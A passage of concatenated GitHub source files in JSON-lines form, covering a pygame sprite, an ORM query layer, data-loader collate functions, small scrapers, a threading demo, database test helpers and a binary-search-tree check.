direction\n if self.direction == 1:\n self.rect.x += 50\n else:\n self.rect.x -= 50\n # Get a new strafe direction\n self.direction = randint(0, 1)\n self.timer = time() # reset the timer\n # Forbid the object to leave the screen\n if self.rect.x + self.rect.width > settings.SCREEN_WIDTH:\n self.rect.x = settings.SCREEN_WIDTH - self.rect.width - 10\n elif self.rect.x - 5 < 0:\n self.rect.x = 10\n\n def explode(self) -> None:\n \"\"\"\n Display an explosion animation when the object is dead.\n \"\"\"\n # Prevent the player from moving\n self.speed = 0\n self.center = self.rect.center # get the center of the object to display each explosion frame in the same pos\n # Check if all explosion images have been displayed (>= avoids an\n # IndexError when the index reaches the end of the sprite list)\n if self.index >= len(self.explosion_sprites):\n self.kill() # destroy the object\n else:\n self.image = self.explosion_sprites[int(self.index)] # display the current explosion image\n self.rect = self.image.get_rect(center=self.center)\n self.index += 0.2\n\n def update(self, screen) -> None:\n \"\"\"\n Update the object.\n\n Parameters\n ----------\n screen : pygame.display.set_mode()\n The screen object created by pygame\n \"\"\"\n # Check if the object can strafe and strafe\n self.strafing()\n # Check if the object is dead and start the exploding animation\n if self.health == 0:\n self.explode()\n # If the object manages to leave the screen, decrease player's health points by 1 and kill this object\n elif self.rect.y > pygame.display.get_surface().get_height():\n settings.player_health_points -= 1\n self.lose_hp_sound.play() # play lose hp sound\n self.kill()\n else:\n self.rect.y += self.speed # Move the object downwards\n","repo_name":"Raures/StarDefender","sub_path":"objects/spaceships/UFO.py","file_name":"UFO.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73168319139","text":"import copy\nimport operator\nfrom functools import reduce, partial\nfrom sqlbuilder import 
smartsql\nfrom ascetic.exceptions import ObjectDoesNotExist\nfrom ascetic.relations import Relation, ForeignKey, OneToOne, OneToMany\nfrom ascetic.signals import field_mangling, column_mangling\nfrom ascetic.utils import to_tuple\n\nfactory = copy.copy(smartsql.factory)\n\ntry:\n str = unicode # Python 2.* compatible\n string_types = (basestring,)\n integer_types = (int, long)\nexcept NameError:\n string_types = (str,)\n integer_types = (int,)\n\n\n@factory.register\nclass Table(smartsql.Table):\n\n def __init__(self, mapper, *args, **kwargs):\n \"\"\"\n :type mapper: ascetic.mappers.Mapper\n \"\"\"\n super(Table, self).__init__(mapper.db_table, *args, **kwargs)\n self._mapper = mapper\n\n @property\n def q(self):\n return self._mapper.query\n\n def get_fields(self, prefix=None):\n return self._mapper.get_sql_fields(prefix)\n\n def get_field(self, name):\n if type(name) == tuple:\n return smartsql.CompositeExpr(*(self.get_field(k) for k in name))\n\n parts = name.split(smartsql.LOOKUP_SEP, 1)\n name = self.__mangle_field(parts[0])\n\n if name == 'pk':\n name = self._mapper.pk\n elif isinstance(self._mapper.relations.get(name, None), Relation):\n relation = self._mapper.relations.get(name)\n related_alias = relation.related_mapper.sql_table.as_(next(smartsql.auto_name))\n return AutoJoinedTable(\n related_alias,\n smartsql.InnerJoin(None, related_alias, relation.get_join_where(self, related_alias))\n ).f\n # name = self._mapper.relations.get(name).field\n\n if type(name) == tuple:\n if len(parts) > 1:\n # FIXME: \"{}_{}\".format(alias, name) ???\n raise Exception(\"Can't set single alias for multiple fields of composite key {}.{}\".format(self.model, name))\n return smartsql.CompositeExpr(*(self.get_field(k) for k in name))\n\n if name in self._mapper.fields:\n name = self._mapper.fields[name].column\n\n parts[0] = self.__mangle_column(name)\n return super(Table, self).get_field(smartsql.LOOKUP_SEP.join(parts))\n\n def __mangle_field(self, name):\n results = field_mangling.send(sender=self, field=name, mapper=self._mapper)\n results = [i[1] for i in results if i[1]]\n if results:\n # response in format tuple(priority: int, mangled_field_name: str)\n results.sort(key=lambda x: x[0], reverse=True) # Sort by priority\n return results[0][1]\n return name\n\n def __mangle_column(self, column):\n results = column_mangling.send(sender=self, column=column, mapper=self._mapper)\n results = [i[1] for i in results if i[1]]\n if results:\n # response in format tuple(priority: int, mangled_column_name: str)\n results.sort(key=lambda x: x[0], reverse=True) # Sort by priority\n return results[0][1]\n return column\n\n\n@factory.register\nclass TableAlias(smartsql.TableAlias, Table):\n @property\n def _mapper(self):\n return getattr(self._table, '_mapper', None) # self._table can be a subquery\n\n\nclass AutoJoinedTable(Table):\n def __init__(self, delegate, auto_join):\n self.m_delegate__ = delegate\n self.m_auto_join__ = auto_join\n\n smartsql.Table.__init__(self, None)\n if isinstance(delegate, smartsql.Table):\n for f in delegate._fields.values():\n self._append_field(copy.copy(f))\n\n @property\n def _mapper(self):\n return getattr(self.m_delegate__, '_mapper', None) # self._table can be a subquery\n\n\n@smartsql.compile.when(AutoJoinedTable)\ndef compile_autojoinedtable(compile, expr, state):\n if (expr.m_auto_join__ not in state.auto_join_tables):\n state.auto_join_tables.append(expr.m_auto_join__)\n compile(expr.m_delegate__, state)\n\n\nclass Result(smartsql.Result):\n \"\"\"Result adapted for 
table.\"\"\"\n\n def __init__(self, mapper, db):\n \"\"\"\n :type mapper: ascetic.mappers.Mapper\n :type db: ascetic.interfaces.IDatabase\n \"\"\"\n self.mapper = mapper\n self._prefetch = {}\n self._select_related = {}\n self._is_base = True\n self._map = default_map\n self._cache = None # empty list also can be a cached result, so, using None instead of empty list\n self._db = db\n\n def __len__(self):\n self.fill_cache()\n return len(self._cache)\n\n def __iter__(self):\n self.fill_cache()\n return iter(self._cache)\n\n def __getitem__(self, key):\n if self._cache:\n return self._cache[key]\n elif isinstance(key, integer_types):\n self._query = super(Result, self).__getitem__(key)\n try:\n return list(self)[0]\n except IndexError:\n raise ObjectDoesNotExist\n else:\n return super(Result, self).__getitem__(key)\n\n def execute(self):\n \"\"\"Implementation of query execution\"\"\"\n return self._db.execute(self._query)\n\n insert = update = delete = execute\n\n def select(self):\n return self\n\n def count(self):\n if self._cache is not None:\n return len(self._cache)\n return self.execute().fetchone()[0]\n\n def clone(self):\n c = smartsql.Result.clone(self)\n c._cache = None\n c._is_base = False\n return c\n\n def fill_cache(self):\n if self.is_base():\n raise Exception('You should clone base queryset before query.')\n elif self._cache is None:\n self._cache = list(self.iterator())\n self.populate_prefetch()\n\n def iterator(self):\n \"\"\"Iterator\"\"\"\n cursor = self.execute()\n fields = tuple(f[0] for f in cursor.description)\n\n if isinstance(self._map, type):\n map_row = self._map(self)\n else:\n map_row = partial(self._map, result=self, state={})\n\n for row in cursor.fetchall():\n yield map_row(row=zip(fields, row))\n\n def db(self, db=None):\n \"\"\"\n :type db: ascetic.interfaces.IDatabase or None\n :rtype: ascetic.interfaces.IDatabase\n \"\"\"\n if db is None:\n return self._db\n self._db = db\n return self._query\n\n def is_base(self, value=None):\n if value is None:\n return self._is_base\n self._is_base = value\n return self._query\n\n def map(self, map):\n \"\"\"Sets map.\"\"\"\n c = self\n c._map = map\n return c._query\n\n def prefetch(self, *a, **kw):\n \"\"\"Prefetch relations\"\"\"\n relations = self.mapper.relations\n if a and not a[0]: # .prefetch(False)\n self._prefetch = {}\n else:\n self._prefetch = copy.copy(self._prefetch)\n self._prefetch.update(kw)\n self._prefetch.update({i: relations[i].related_query for i in a})\n return self._query\n\n def populate_prefetch(self):\n relations = self.mapper.relations\n for key, query in self._prefetch.items():\n relation = relations[key]\n preset_relation = RelationPresetter(relation)\n # recursive handle prefetch\n cond = reduce(operator.or_, (relation.get_related_where(obj) for obj in self._cache))\n query = query.where(cond)\n for obj in self._cache:\n for prefetched_obj in query:\n if relation.get_value(obj) == relation.get_related_value(prefetched_obj):\n preset_relation(obj, related_obj=prefetched_obj)\n\n\nclass RelationPresetter(object):\n def __new__(cls, relation):\n if isinstance(relation, ForeignKey):\n return object.__new__(ForeignKeyPresetter)\n elif isinstance(relation, OneToOne):\n return object.__new__(OneToOnePresetter)\n elif isinstance(relation, OneToMany):\n return object.__new__(OneToManyPresetter)\n else:\n raise NotImplementedError(relation)\n\n def __init__(self, relation):\n \"\"\"\n :type relation: ascetic.relations.Relation\n \"\"\"\n self._relation = relation\n\n def __call__(self, obj, 
related_obj):\n raise NotImplementedError\n\n @property\n def name(self):\n return self._relation.name\n\n @property\n def related_name(self):\n return self._relation.related_name\n\n @staticmethod\n def set_value(obj, attr_name, related_obj):\n setattr(obj, attr_name, related_obj)\n\n @staticmethod\n def append_value(obj, attr_name, related_item):\n query = getattr(obj, attr_name)\n if query.result._cache is None:\n query.result._cache = []\n query.result._cache.append(related_item)\n\n\nclass ForeignKeyPresetter(RelationPresetter):\n def __call__(self, obj, related_obj):\n self.set_value(obj, self.name, related_obj)\n self.append_value(related_obj, self.related_name, obj)\n\n\nclass OneToOnePresetter(RelationPresetter):\n def __call__(self, obj, related_obj):\n self.set_value(obj, self.name, related_obj)\n self.set_value(related_obj, self.related_name, obj)\n\n\nclass OneToManyPresetter(RelationPresetter):\n def __call__(self, obj, related_obj):\n if not hasattr(obj, self.name):\n setattr(obj, self.name, [])\n self.append_value(obj, self.name, related_obj)\n self.set_value(related_obj, self.related_name, obj)\n\n\ndef default_map(result, row, state):\n return result.mapper.load(row, result.db(), from_db=True)\n\n\nclass SelectRelatedMap(object):\n\n def __init__(self, result):\n self._result = result\n self._state = {}\n\n def __call__(self, row):\n models = [self._result.mapper.model]\n relations = self._result._select_related\n for rel in relations:\n models.append(rel.related_model)\n rows = self._get_model_rows(models, row)\n objs = self._get_objects(models, rows)\n self._build_relations(relations, objs)\n return objs\n\n def _get_model_rows(self, models, row):\n rows = [] # There can be multiple instances of the same model, so _state is keyed by (model, pk) instead of by model\n start = 0\n for model in models:\n mapper = self._result.mapper.get_mapper(model)\n length = len(mapper.get_sql_fields())\n rows.append(row[start:start + length]) # slice relative to start, not an absolute end index\n start += length\n return rows\n\n def _get_objects(self, models, rows):\n objs = []\n for model, model_row in zip(models, rows):\n mapper = self._result.mapper.get_mapper(model)\n pk = to_tuple(mapper.pk)\n pk_columns = tuple(mapper.fields[k].columns for k in pk)\n model_row_dict = dict(model_row)\n pk_values = tuple(model_row_dict[k] for k in pk_columns)\n key = (model, pk_values)\n if key not in self._state:\n self._state[key] = mapper.load(model_row, self._result.db(), from_db=True)\n objs.append(self._state[key])\n return objs\n\n def _build_relations(self, relations, objs):\n for i, relation in enumerate(relations):\n obj, related_obj = objs[i], objs[i + 1]\n RelationPresetter(relation)(obj, related_obj)\n","repo_name":"emacsway/ascetic","sub_path":"ascetic/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":11365,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"46163085306","text":"# Use the file name mbox-short.txt as the file name\r\nfname = input(\"Enter file name: \")\r\nfh = open(fname)\r\nvalue_array=[]\r\ntotal = 0\r\ncount = 0\r\nfor line in fh:\r\n if not line.startswith(\"X-DSPAM-Confidence:\") : continue\r\n else:\r\n line=line.split(':')\r\n line[1] = line[1].replace('\\n', '')\r\n total = total + float(line[1])\r\n count = count + 1\r\n #print(line[1])\r\n #value_array.append(float(line[1]))\r\n \r\nprint(\"Average spam confidence: 
{0:.12f}\".format(total/count))","repo_name":"childofthefence/python_datasctructures_umich","sub_path":"spam_confidence.py","file_name":"spam_confidence.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4156516134","text":"import random\nimport torch\nfrom data_loaders.amass.tools import collate_tensor_with_padding\n\ndef lengths_to_mask(lengths, max_len):\n # max_len = max(lengths)\n mask = torch.arange(max_len, device=lengths.device).expand(len(lengths), max_len) < lengths.unsqueeze(1)\n return mask\n \n\ndef collate_tensors(batch):\n dims = batch[0].dim()\n max_size = [max([b.size(i) for b in batch]) for i in range(dims)]\n size = (len(batch),) + tuple(max_size)\n canvas = batch[0].new_zeros(size=size)\n for i, b in enumerate(batch):\n sub_tensor = canvas[i]\n for d in range(dims):\n sub_tensor = sub_tensor.narrow(d, 0, b.size(d))\n sub_tensor.add_(b)\n return canvas\n\n\ndef collate(batch):\n notnone_batches = [b for b in batch if b is not None]\n databatch = [b['inp'] for b in notnone_batches]\n if 'lengths' in notnone_batches[0]:\n lenbatch = [b['lengths'] for b in notnone_batches]\n else:\n lenbatch = [len(b['inp'][0][0]) for b in notnone_batches]\n\n\n databatchTensor = collate_tensors(databatch)\n lenbatchTensor = torch.as_tensor(lenbatch)\n maskbatchTensor = lengths_to_mask(lenbatchTensor, databatchTensor.shape[-1]).unsqueeze(1).unsqueeze(1) # unqueeze for broadcasting\n\n motion = databatchTensor\n cond = {'y': {'mask': maskbatchTensor, 'lengths': lenbatchTensor}}\n\n if 'is_transition' in notnone_batches[0]:\n is_transition_batch = torch.stack([b['is_transition']for b in notnone_batches])\n cond['y'].update({'is_transition': is_transition_batch})\n\n if 'length_transition' in notnone_batches[0]:\n length_transition = [b['length_transition'] for b in notnone_batches]\n cond['y'].update({'length_transition': length_transition})\n\n if 'text' in notnone_batches[0]:\n textbatch = [b['text'] for b in notnone_batches]\n cond['y'].update({'text': textbatch})\n\n if 'other_motion' in notnone_batches[0]:\n other_motion = [b['other_motion'] for b in notnone_batches]\n other_motion = collate_tensors(other_motion)\n cond['y'].update({'other_motion': other_motion})\n\n if 'person_id' in notnone_batches[0]:\n textbatch = [b['person_id'] for b in notnone_batches]\n cond['y'].update({'person_id': textbatch})\n\n if 'tokens' in notnone_batches[0]:\n textbatch = [b['tokens'] for b in notnone_batches]\n cond['y'].update({'tokens': textbatch})\n\n if 'action' in notnone_batches[0]:\n actionbatch = [b['action'] for b in notnone_batches]\n cond['y'].update({'action': torch.as_tensor(actionbatch).unsqueeze(1)})\n\n # collate action textual names\n if 'action_text' in notnone_batches[0]:\n action_text = [b['action_text']for b in notnone_batches]\n cond['y'].update({'action_text': action_text})\n\n if 'action_cat' in notnone_batches[0]:\n action_cat = torch.stack([b['action_cat']for b in notnone_batches])\n action_cat_mask = torch.stack([b['action_cat_mask']for b in notnone_batches])\n act_cat_list = [b['act_cat_list']for b in notnone_batches]\n cond['y'].update({'action_cat': action_cat})\n cond['y'].update({'action_cat_mask': action_cat_mask})\n cond['y'].update({'act_cat_list': act_cat_list})\n\n return motion, cond\n\n# an adapter to our collate func\ndef t2m_collate(batch):\n # batch.sort(key=lambda x: x[3], reverse=True)\n adapted_batch = [{\n 'inp': 
torch.from_numpy(b[4].T).float().unsqueeze(1), # [seqlen, J] -> [J, 1, seqlen]\n 'text': b[2], #b[0]['caption']\n 'tokens': b[6],\n 'lengths': b[5],\n 'is_transition': torch.zeros(1), # just for eval not really needed\n } for b in batch]\n return collate(adapted_batch)\n\ndef babel_eval_collate(batch):\n # the original try/except TypeError around this block only printed a debug\n # value and left adapted_batch undefined on failure, so it was removed\n adapted_batch = [{\n 'inp': torch.from_numpy(b[4].T).float().unsqueeze(1), # [seqlen, J] -> [J, 1, seqlen]\n 'text': b[2], #b[0]['caption']\n 'tokens': b[6],\n 'lengths': b[5],\n 'is_transition': torch.from_numpy(b[7]),\n } for b in batch]\n return collate(adapted_batch)\n\ndef pw3d_collate(batch):\n # batch.sort(key=lambda x: x[3], reverse=True)\n adapted_batch = [{\n 'other_motion': torch.tensor(b[0].T).float().unsqueeze(1),\n 'inp': torch.tensor(b[4].T).float().unsqueeze(1), # [seqlen, J] -> [J, 1, seqlen]\n 'text': b[2], #b[0]['caption']\n 'person_id': b[3],\n 'tokens': b[6],\n 'lengths': b[5],\n } for b in batch]\n return collate(adapted_batch)\n\nfrom enum import IntEnum\n\nclass motion_type(IntEnum):\n MOTION_0 = 0\n MOTION_1 = 1\n MOTION_0_W_T = 2\n MOTION_1_W_T = 3\n\ndef pad_sample_with_zeros(sample, vector_len):\n # pad inp, change lengths, and pad is_transition\n n_feats, _, seq_len = sample['inp'].shape\n len_to_pad = vector_len-seq_len\n is_transition_padding = torch.zeros(len_to_pad)\n inp_padding = torch.zeros((n_feats, 1, len_to_pad))\n sample['inp'] = torch.cat((sample['inp'], inp_padding), dim=2)\n sample['is_transition'] = torch.cat((sample['is_transition'], is_transition_padding))\n return sample\n\ndef babel_collate(batch):\n from data_loaders.amass.tools import collate_pairs_and_text\n batch = collate_pairs_and_text(batch)\n bs = len(batch['motion_feats'])\n adapted_batch = []\n for ii in range(bs):\n adapted_batch.append({\n 'inp': batch['motion_feats'][ii].permute(1, 0).unsqueeze(1), # [seqlen, J] -> [J, 1, seqlen]\n 'text': batch['text'][ii],\n 'lengths': batch['length'][ii],\n 'is_transition': batch['is_transition'][ii]})\n return collate(adapted_batch)\n","repo_name":"priorMDM/priorMDM","sub_path":"data_loaders/tensors.py","file_name":"tensors.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","stars":311,"dataset":"github-code","pt":"35"} +{"seq_id":"10993344814","text":"# Purpose: download word audio from the Shanbay vocabulary site into mp3path\n# http://media.shanbay.com/audio/us/hello.mp3 American pronunciation\n# http://media.shanbay.com/audio/en/hello.mp3 British pronunciation\n\nimport csv\nimport os\nimport download\nimport time\nimport playsound\nimport searchwordApi\n\n\n#with open('eng31.csv',encoding='utf-8') as englishFile:\n\nmydict=[]\nline=[]\nk=0\n# eng.csv layout (inferred from the indexing below): column 5 holds the word\n# and column 6 is a \"1\"/\"0\" flag marking rows that should be processed\nwith open('eng.csv') as englishFile:\n englishReader = csv.reader(englishFile)\n for i in englishReader:\n #print(str(englishReader.line_num) + str(i[5]))\n if str(i[6])==\"1\":\n k=k+1\n word=str(i[5])\n wordmean=searchwordApi.getwordMean(word)\n #print(word)\n path=r'dict1/'+word+r'.mp3'\n #print(path)\n print(k)\n if not os.path.exists(path):\n print('audio file not found: '+word)\n if wordmean['mean'][0]==0:\n print(word)\n print('\\n------- cannot find this word in the dictionary\\n!')\n else:\n line=i\n line.append(wordmean['mean'])\n mydict.append(line) # list.append returns None, so don't rebind line to it\n\n\nwriteFile=open('EnglishALl.csv','w',newline='')\ncsvWriter=csv.writer(writeFile)\nfor i in mydict:\n csvWriter.writerow(i)\nwriteFile.close()\n\n#print(len(mydict))\n#mydict= list(set(mydict))\n#print(len(mydict))\n \n #playsound.playsound(mp3path+str(i[5]) +'.mp3', 
True)\n\n\n","repo_name":"sigerclx/python","sub_path":"python-book01/2018/2018-07/EnglistTest/downloadJinshaMP3/creatWordlist.py","file_name":"creatWordlist.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"35419480972","text":"#!/usr/bin/env python3\n#coding: utf-8\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MOAARR South Park ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# This is free software,\n# do whatever you want.\n# Except evil stuff!\n###############################################################################\nimport re\nimport pickle\nimport requests\nimport subprocess\nfrom bs4 import BeautifulSoup\n\nmain_url = \"http://www.southpark.de/alle-episoden/\"\n\n\ndef fetcher(url):\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'lxml')\n return soup\n\n\ndef extractor(results):\n links = []\n for item in results:\n sitem = str(item)\n if \"href\" in sitem:\n link = sitem.split('href=\"')[1].split('\">')[0]\n if 'http' in link:\n links.append(link)\n return links\n\n\ndef walker():\n soup = fetcher(main_url)\n res_season = soup.find_all('a', attrs={'class': re.compile(r'seasonbtn')})\n all_seasons = extractor(res_season)\n links = []\n for season in all_seasons:\n soup = fetcher(season)\n res_episodes = soup.find_all('h4')\n link_bundle = extractor(res_episodes)\n links.append(link_bundle)\n return links\n\n\ndef leecher():\n try:\n with open(\"all_links.txt\", 'rb') as f:\n link_list = pickle.load(f)\n except(OSError):\n link_list = walker()\n with open(\"all_links.txt\", 'wb') as f:\n pickle.dump(link_list, f)\n finally:\n for idx, season in enumerate(link_list):\n print(\"\\n++++\\nLeeching Season: \", idx+1, \"\\n====\\n\")\n for episode in season:\n print(episode)\n command = ['youtube-dl', '-o', '%(title)s.%(ext)s', episode]\n subprocess.call(command)\n\n\nif __name__ == '__main__':\n leecher()\n","repo_name":"gsec/spoo-dl","sub_path":"spoo-dl.py","file_name":"spoo-dl.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10993344814","text":"import queue\nimport threading\nimport copy\n\nshared_queue = queue.Queue()\nresult_queue = queue.Queue()\n\nfor i in range(10):\n shared_queue.put(i)\n\ndef add_consumer():\n while True:\n try:\n item = shared_queue.get(block=False)\n item_copy = copy.deepcopy(item)\n result = item_copy + 10\n result_queue.put(result)\n shared_queue.task_done()\n print(\"Addition Consumer: {} + 10 = {}\".format(item, result))\n except queue.Empty:\n break\n\ndef multiply_consumer():\n while True:\n try:\n item = shared_queue.get(block=False)\n item_copy = copy.deepcopy(item)\n result = item_copy * 10\n result_queue.put(result)\n shared_queue.task_done()\n print(\"Multiplication Consumer: {} * 10 = {}\".format(item, result))\n except queue.Empty:\n break\n\ndef subtract_consumer():\n while True:\n try:\n item = shared_queue.get(block=False)\n item_copy = copy.deepcopy(item)\n result = item_copy - 5\n result_queue.put(result)\n shared_queue.task_done()\n print(\"Subtraction Consumer: {} - 5 = {}\".format(item, result))\n except queue.Empty:\n break\n\nadd_thread = threading.Thread(target=add_consumer)\nmultiply_thread = threading.Thread(target=multiply_consumer)\nsubtract_thread = 
threading.Thread(target=subtract_consumer)\n\nadd_thread.start()\nmultiply_thread.start()\nsubtract_thread.start()\n\nadd_thread.join()\nmultiply_thread.join()\nsubtract_thread.join()\n\nshared_queue.join()\n\nprint(\"All items processed\")","repo_name":"coenfuse/devops","sub_path":"extra/experiments/spmc/spmc2.py","file_name":"spmc2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72687401701","text":"import re\nimport time\n\nimport palo_client\nimport palo_config\nimport palo_logger\nimport palo_job\nimport palo_types\nimport util\n\nconfig = palo_config.config\nLOG = palo_logger.Logger.getLogger()\nL = palo_logger.StructedLogMessage\n\n\ndef get_client(host=None):\n \"\"\"get a new client\"\"\"\n if host is None:\n host = config.fe_host\n client = palo_client.get_client(host, config.fe_query_port, user=config.fe_user,\n password=config.fe_password, http_port=config.fe_http_port)\n return client\n\n\ndef create_workspace(database_name):\n \"\"\"create a new palo client connection, create the database, then use it and return the client\"\"\"\n client = palo_client.get_client(config.fe_host, config.fe_query_port, user=config.fe_user,\n password=config.fe_password, http_port=config.fe_http_port)\n client.clean(database_name)\n client.create_database(database_name)\n client.use(database_name)\n return client\n\n\ndef check2(client1, sql1, client2=None, sql2=None, forced=False):\n \"\"\"\n compare the results of two queries;\n client can be PaloClient or mysql.cursor\n \"\"\"\n if client2 is None and sql2 is None:\n assert 0 == 1, 'the input of check2() is wrong'\n elif client2 is None:\n client2 = client1\n elif sql2 is None:\n sql2 = sql1\n ret1 = client1.execute(sql1)\n ret2 = client2.execute(sql2)\n util.check(ret1, ret2, forced)\n return True\n\n\n
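# e.g. check2(client_a, 'select k1, k2 from t order by k1', client2=client_b)\n# runs the same query on both connections and asserts that the results match.\n\n\n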
def get_explain_rollup(client, sql):\n \"\"\"\n Get explain table\n \"\"\"\n result = client.execute('EXPLAIN ' + sql)\n if result is None:\n return None\n rollup_flag = 'TABLE: '\n explain_rollup = list()\n for element in result:\n message = element[0].lstrip()\n profile = message.split(',')\n for msg in profile:\n if msg.startswith(rollup_flag):\n LOG.info(L('explain', msg=msg))\n table = msg[len(rollup_flag):].rstrip(' ')\n pattern = re.compile(r'[(](.*?)[)]', re.S)\n rollup = re.findall(pattern, table)\n explain_rollup.append(rollup[0])\n return explain_rollup\n\n\ndef assert_stop_routine_load(ret, client, stop_job=None, info=''):\n \"\"\"assert, and stop the routine load job if the check fails\"\"\"\n ret = client.show_routine_load(stop_job)\n if not ret and stop_job is not None:\n try:\n client.stop_routine_load(stop_job)\n except Exception as e:\n print(str(e))\n assert ret, info\n\n\ndef wait_commit(client, routine_load_job_name, committed_expect_num, timeout=600):\n \"\"\"wait until the task is committed\"\"\"\n print('expect committed rows: %s\\n' % committed_expect_num)\n while timeout > 0:\n ret = client.show_routine_load(routine_load_job_name,)\n routine_load_job = palo_job.RoutineLoadJob(ret[0])\n loaded_rows = routine_load_job.get_loaded_rows()\n print(loaded_rows)\n if str(loaded_rows) == str(committed_expect_num):\n return True\n state = routine_load_job.get_state()\n if state != 'RUNNING':\n print(\"routine load job's state is not running, it's %s\" % state)\n return False\n timeout -= 3\n time.sleep(3)\n return False\n\n\ndef execute_ignore_error(func, *argc, **kwargs):\n \"\"\"execute a function and ignore any sql error\"\"\"\n try:\n func(*argc, **kwargs)\n except Exception as e:\n LOG.info(L('execute ignore error', msg=str(e)))\n print(e)\n\n\ndef execute_retry_when_msg(msg, func, *argc, **kwargs):\n \"\"\"retry while the error raised by the SQL contains msg\"\"\"\n retry = 20\n while retry > 0:\n try:\n ret = func(*argc, **kwargs)\n return ret\n except Exception as e:\n if msg in str(e):\n time.sleep(3)\n retry -= 1\n LOG.info(L(\"get error msg\", msg=str(e)))\n return False\n\n\ndef check_by_file(expect_file, table_name=None, sql=None,\n client=None, database_name=None, **kwargs):\n \"\"\"\n Verify the result of a table or a sql query against a csv expectation file.\n The csv file is parsed into structures matching the column types returned\n by the executed sql, and then compared with the actual result.\n expect_file: the expectation file\n table_name: name of the table to be verified\n sql: the sql query to be verified; table_name and sql must not both be None\n client: the client used to execute sql; a new connection is created if None\n database_name: name of the database\n **kwargs: overrides the type of a column of the sql or table, useful for\n complex types, e.g. k2=palo_types.ARRAY_INT\n e.g. arrays come back as strings, so an explicit type can be given\n to verify array columns and the like\n \"\"\"\n LOG.info(L('check file', file=expect_file))\n if table_name is None and sql is None:\n assert 0 == 1, 'there is no table and no query to be checked'\n if client is None:\n client = get_client()\n if database_name:\n client.use(database_name)\n if table_name:\n if database_name:\n table_name = '%s.%s' % (database_name, table_name)\n sql = 'select * from %s' % table_name\n cursor, ret = client.execute(sql, return_cursor=True)\n result_info = cursor.description\n column_name_list = util.get_attr(result_info, 0)\n column_type_list = util.get_attr(result_info, 1)\n for col_name, col_type in kwargs.items():\n try:\n idx = column_name_list.index(col_name)\n column_type_list[idx] = col_type\n except Exception as e:\n print(type(col_name), type(column_name_list[1]))\n print(\"%s is not a column in %s\" % (col_name, column_name_list))\n expect_ret = palo_types.convert_csv_to_ret(expect_file, column_type_list)\n # if the sql result contains complex types, convert them before comparing\n if max(column_type_list) > 1000:\n ret = palo_types.convert_ret_complex_type(ret, column_type_list)\n util.check(ret, expect_ret, True)\n return True\n\n\ndef check_by_sql(tested_sql, expect_sql, client=None, database_name=None, **kwargs):\n \"\"\"\n Compare the results of two sql queries; suitable for complex types.\n Both queries are executed and their results normalized before comparison.\n Column types can be specified via **kwargs.\n tested_sql: the sql under test\n expect_sql: the verification sql whose result is expected to be correct\n \"\"\"\n if client is None:\n client = get_client()\n if database_name:\n client.use(database_name)\n \n cursor, expect_ret = client.execute(expect_sql, return_cursor=True)\n # get the column names and type codes of the result from the cursor\n result_info = cursor.description\n column_name_list = util.get_attr(result_info, 0)\n column_type_list = util.get_attr(result_info, 1)\n tested_ret = client.execute(tested_sql)\n \n for col_name, col_type in kwargs.items():\n try:\n idx = column_name_list.index(col_name)\n column_type_list[idx] = col_type\n except Exception as e:\n print(type(col_name), type(column_name_list[1]))\n print(\"%s is not a column in %s\" % (col_name, column_name_list))\n\n if len(kwargs) != 0:\n processed_expect_ret = palo_types.convert_ret_complex_type(expect_ret, column_type_list)\n processed_tested_ret = palo_types.convert_ret_complex_type(tested_ret, column_type_list)\n util.check(processed_tested_ret, processed_expect_ret, True)\n else:\n util.check(tested_ret, expect_ret, True)\n return True\n\n","repo_name":"apache/doris","sub_path":"pytest/lib/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7332,"program_lang":"python","lang":"en","doc_type":"code","stars":10091,"dataset":"github-code","pt":"35"} +{"seq_id":"10174882639","text":"import requests\nfrom bs4 import BeautifulSoup\nheaders = {'User-Agent':'Chrome/75.0.3770.142'}\nmoviePy = []\nfor i in range(0,250,25):\n res_href = 'https://movie.douban.com/top250?start=%s&filter='%str(i)\n res = 
requests.get(res_href,headers=headers)\n html = res.text\n soup = BeautifulSoup(html,'html.parser')\n movie_li_allocation = soup.find('div',class_='article')\n movie_li = movie_li_allocation.find_all('li')\n for movies in movie_li:\n movie_name = movies.find('div',class_='hd').text.strip().replace('\\n','')\n movie_href = movies.find('div',class_='hd').find('a')['href']\n movie_rank = movies.find('div',class_='pic').text.replace('\\n','')\n # movie_info = movies.find('div',class_ = 'bd').text.strip()\n try:\n movie_quote = movies.find('span', class_='inq').text\n except AttributeError:\n movie_quote = ''\n try:\n movie_rate = movies.find('span', class_='rating_num').text\n except AttributeError:\n movie_rate = ''\n movie_cell = [movie_rank,movie_name,movie_quote,movie_rate,movie_href]\n moviePy.append(movie_cell)\n\nfor k in moviePy:\n print(k)","repo_name":"li841001/python3","sub_path":"L4/L4_practice_1.py","file_name":"L4_practice_1.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42602353908","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n self.path = []\n \n self.in_order(root)\n\n for i in range(len(self.path) - 1):\n if self.path[i] >= self.path[i + 1]:\n return False\n \n return True\n \n def in_order(self, root: TreeNode):\n if root:\n self.in_order(root.left)\n self.path.append(root.val)\n 